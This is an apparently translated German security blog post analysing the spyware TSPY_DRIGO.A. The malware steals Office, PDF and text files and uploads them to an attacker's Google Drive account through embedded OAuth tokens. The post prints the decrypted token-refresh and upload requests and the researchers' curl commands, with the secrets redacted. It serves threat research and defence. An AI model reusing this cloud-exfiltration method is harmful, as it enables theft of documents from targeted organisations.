Gezielte Angriffe: Informationsdiebstahl über Google Drive

Originalartikel von Kervin Alintanahin, Threats Analyst

Es ist nicht neu, dass Cyberkriminelle cloud-basierte Sharing-Webseiten für ihre Zwecke missbrauchen – sei es für die Nutzung kostenlosen Speicherplatzes für ihre bösartigen Dateien oder um Sicherheitslösungen zu umgehen. Zu solchen Sites, die Malware bereits ausgenutzt hat, gehören DropBox, Sendspace oder Evernote. Nun ist auch Google Drive hinzugekommen.
Trend Micros Bedrohungsforscher fanden Schadsoftware (TSPY_DRIGO.A), die Google Drive als Möglichkeit nutzt, um Informationen von ihren Opfern abzuschöpfen.

Zugang zu Google Drive

Sobald die Schadsoftware ausgeführt wird, prüft sie die folgenden Dateitypen an bestimmten Speicherorten, um sie auf Google Drive hochzuladen:

  • XLSX
  • XLS
  • DOC
  • DOCX
  • PDF
  • TXT
  • PPT
  • PPTX

Zu den geprüften Speicherorten gehören Recycle Bin und das Verzeichnis User Documents.

Um die Dateien auf Google Drive hochzuladen, wurden die client_id und client_secret zusammen mit einem Refresh Token in die Schadsoftware eingebettet. Refresh Token sind als Teil des von Google Drive genutzten OAuth 2.0-Protokolls erforderlich. Das Protokoll wird auch von Twitter, Facebook und anderen Sites genutzt, um sich über ihre Konten bei anderen Websites anzumelden. Zugangs-Tokens werden für den Zugriff auf ein Google Drive-Konto benötigt. Doch diese Zugangs-Token verfallen, und deshalb bedarf es der Refresh-Token für einen neuen Zugangs-Token.

Die Bedrohungsforscher entschlüsselten die Kommunikation der Schadsoftware und erkannten Aktivitäten wie das Anfragen nach neuen Tokens und Dateien hochladen.

; request for new token

POST /o/oauth2/token HTTP/1.1
Host: accounts.google.com
User-Agent: Go 1.1 package http
Content-Length: 208
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

client_id={REMOVED}apps.googleusercontent.com&client_secret= {REMOVED}&grant_type=refresh_token&refresh_token={REMOVED}

;reply for new token

HTTP/1.1 200 OK
Content-Type: application/json; charset=utf-8
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Fri, 01 Jan 1990 00:00:00 GMT
Date: Thu, 14 Oct 2014 08:08:32 GMT
Content-Disposition: attachment; filename=”sample.txt”; filename*=UTF-8”sample.txt
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Alternate-Protocol: 443:quic
Transfer-Encoding: chunked

{
“access_token” : “{REMOVED}”,
“token_type” : “Bearer”,
“expires_in” : 3600
}

;upload file

POST /upload/drive/v2/files?alt=json&uploadType=multipart HTTP/1.1
Host: www.googleapis.com
User-Agent: google-api-go-client/0.5
Content-Length: 398
Authorization: OAuth {REMOVED}

Content-Type: multipart/related; boundary=e0cee80c4f3d21e18e77548a60b374408ce65bc3b76c5de1cdbe2afe7eeb
Accept-Encoding: gzip

Den gleichen Ansatz nutzten die Forscher für das Prüfen der Dateien, die in Google Drive hochgeladen worden waren. Derzeit sind einige der Dateien noch „aktiv“ oder im Konto vorhanden.

Auch zeigte sich, dass die Dateinamen auf die Ziele der Angriffe wiesen, und zwar sind das vor allem Regierungsbehörden.

Die Befehlszeile für das Testing sah folgendermaßen aus:

;Request new token
Curl –d “cliend_id={CLIENT_ID}&client_secret={SECRET_KEY}&grant_type=refresh_token&refresh_token={REFRESH_TOKEN} https://accounts.google.com/o/oauth2/token

;List files
Curl –H “Authorization: OAuth {ACCESS_TOKEN}” https://www.googleapis.com/drive/v2/files?maxresults=1

Here’s an excerpt of the log from the Google Drive account on one of the files uploaded:

{
“kind”: “drive#file”,
:
:
“title”: “{HOSTNAME} C:\\Users\\{USERNAME}\\AppData\\Roaming\\{REMOVED}長致詞{REMOVED}.doc”,
“mimeType”: “application/vnd.google-apps.document”,
:
:
},
“createdDate”: “2014-10-16T10:13:14.339Z”,
“modifiedDate”: “2014-10-16T10:13:16.286Z”,
“modifiedByMeDate”: “2014-10-16T10:13:16.286Z”,
“lastViewedByMeDate”: “2014-10-16T10:13:16.286Z”,
“markedViewedByMeDate”: “1970-01-01T00:00:00.000Z”,
:
:
}

Die andere Google-Verbindung

Google Drive ist nicht die einzige Verbindung dieser Schadsoftware zu Google. Sie wurde mit der Go-Programmiersprache, bekannt als golang, erstellt. Die quelloffene Programmiersprache ist von Google entwickelt worden und soll Unternehmensangaben zufolge mehr Schnelligkeit und weniger Behäbigkeit in die Softwareentwicklung bei Google bringen. Golang ist schon früher 2012 für die Erstellung von Malware eingesetzt worden, und die Forscher nehmen als Grund dafür das Fehlen von Mainstream-Profilen an.

Informationssammlung

Die Analyse hat ergeben, dass die Schadsoftware nur Dokumente auf Google Drive hochladen kann. diese Art von Malware-Routine eignet sich perfekt für das Ausspähen in dem frühen Stadium von gezielten Angriffen. Schließlich bedarf es für einen erfolgreichen Angriff vieler Informationen über das Ziel.

Die folgenden Hashes stehen in Verbindung mit der Attacke:

  • 2C32674B334F10000CB63ED4BA4EE543A16D8572
  • 2D98DDF8F5128853DD33523BCBBD472B8D362705

Trend Micro schützt Unternehmen mit Hilfe der eigenen Custom Defense-Lösung, die einen fortschrittlichen Schutz vor Bedrohungen liefert, indem sie netzwerkweites Monitoring anbietet, um Zero-Day-Malware, bösartige Kommunikatiion sowie das Verhalten von Angreifern aufzuspüren.

Google ist über den Vorfall informiert worden.

Zusätzliche Informationen von Ronnie Giagone, Dove Chiu und Vico Fang.

Schreibe einen Kommentar

Deine E-Mail-Adresse wird nicht veröffentlicht. Erforderliche Felder sind mit * markiert.

*